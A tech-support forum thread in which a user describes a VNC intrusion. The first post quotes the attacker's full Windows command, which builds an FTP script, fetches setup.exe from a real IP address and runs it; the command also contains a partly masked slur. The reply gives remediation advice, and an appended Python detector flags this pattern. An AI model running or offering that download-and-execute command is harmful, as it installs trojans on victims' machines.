[Inactive] Run window - 'u got owned'?

  1. #1
    Join Date
    Feb 2011
    Posts
    1

    [Inactive] Run window - 'u got owned'?

    Strangest thing - last couple of days, whenever I have VNCd into my HTPC the task manager has been open. It's a new build, so I assumed it was just a quirk and I would get around to fixing it...

    This morning, I VNC in and the Run window is open with a message 'u got owned' and the following command had been run previously:

    "cmd /c echo open 202.82.202.142 21 >> ik &echo user ni**a temp >> ik &echo binary >> ik &echo get setup.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &setup.exe &exit"

    Now Windows Defender is popping up with a severe trojan threat: TrojanDownloader:BATFtper.gen

    Obviously I have removed it, but WTF? How did this get past Windows Firewall and Windows Defender in the first place?

  2. #2
    Join Date
    Jul 1998
    Location
    Toronto
    Posts
    25,463
    VNC is a good program but it's not very secure. When the host/server is running and waiting for someone to log in, anyone looking for such an opportunity can hammer it with passwords to try and get in. There are "brute force" exploits that do this very quickly, especially with simple passwords.

    That IP address when googled comes up a few times as being caught in honey traps... those are computers set up to trick people into trying to hack them.

    I would immediately turn off VNC and start using a more secure method to remote in to your computer, Windows Remote Desktop for example. Or you can set up a secure connection using VNC.

    eg- http://www.google.ca/search?q=vnc+se...816af2aa8c722d

    I would also immediately change any passwords you may have stored on that computer.

    It got past the firewall because it was set up to allow communication to the VNC program so it had no idea that the person trying to get in wasn't you. You can get more specific with firewall settings and set it up to only allow access from your specific remote address... but I'd still at least set up a secure pipe as well. Windows Defender or your a/v etc will not have any control over who can log into VNC and no a/v is perfect especially when the person planting the malware actually has control over the computer.

    To make sure that computer is now malware free follow the instructions in this thread..

    http://discussions.virtualdr.com/sho...d.php?t=167915

    and let us see the results below.

    VirtualDr email notices are not working.
    Check back regularly for responses.

    _____________________
    cat lovers click here
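
The command chain quoted in post #1 (FTP script assembled with `echo`, passed to `ftp -s:`, downloaded file then run) can be recognised in process command-line logs. The following is an added example, not part of either post; the function names, severity labels, and the two benign sample lines are assumptions made for illustration.

```python
import re

# Sample 1 is the command quoted in post #1; samples 2 and 3 are constructed benign cases.
SAMPLES = [
    "cmd /c echo open 202.82.202.142 21 >> ik &echo user ni**a temp >> ik "
    "&echo binary >> ik &echo get setup.exe >> ik &echo bye >> ik "
    "&ftp -n -v -s:ik &del ik &setup.exe &exit",
    "cmd /c echo build finished >> build.log",
    "ftp -s:nightly_backup.txt backup.example.internal",
]

ECHO_TO_FILE = re.compile(r"echo\s+(.*?)\s*>>?\s*([^\s&]+)", re.I)
FTP_SCRIPT = re.compile(r"\bftp(?:\.exe)?\s[^&]*?-s:([^\s&]+)", re.I)
FTP_GET = re.compile(r"m?get\s+(\S+)", re.I)


def analyze(cmdline):
    """Describe an 'echo-built FTP script, download, run' chain in one command line."""
    steps = [s.strip() for s in re.split(r"&+", cmdline)]
    written = {}  # script name -> FTP commands echoed into it earlier in the chain
    result = {"inline_script": None, "fetched": [], "executed": [], "script_deleted": False}
    for i, step in enumerate(steps):
        echo = ECHO_TO_FILE.search(step)
        if echo:
            written.setdefault(echo.group(2).lower(), []).append(echo.group(1))
            continue
        ftp = FTP_SCRIPT.search(step)
        if not ftp or ftp.group(1).lower() not in written:
            continue  # plain ftp -s: with a pre-existing script is not this pattern
        script = ftp.group(1).lower()
        later = [s.lower().split() for s in steps[i + 1:] if s]
        result["inline_script"] = script
        result["fetched"] = [m.group(1) for line in written[script]
                             if (m := FTP_GET.match(line))]
        result["executed"] = [f for f in result["fetched"]
                              if any(t[0] == f.lower() for t in later)]
        result["script_deleted"] = any(t[:2] == ["del", script] for t in later)
    return result


def severity(cmdline):
    r = analyze(cmdline)
    if r["executed"]:
        return "high"      # downloaded file is run in the same chain
    if r["inline_script"]:
        return "medium"    # FTP script assembled on the fly
    return "none"


if __name__ == "__main__":
    for line in SAMPLES:
        print(severity(line), analyze(line))
```

The third sample stays unflagged because its script file is not written in the same command line, which is the trait that separates this chain from routine scripted FTP jobs.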
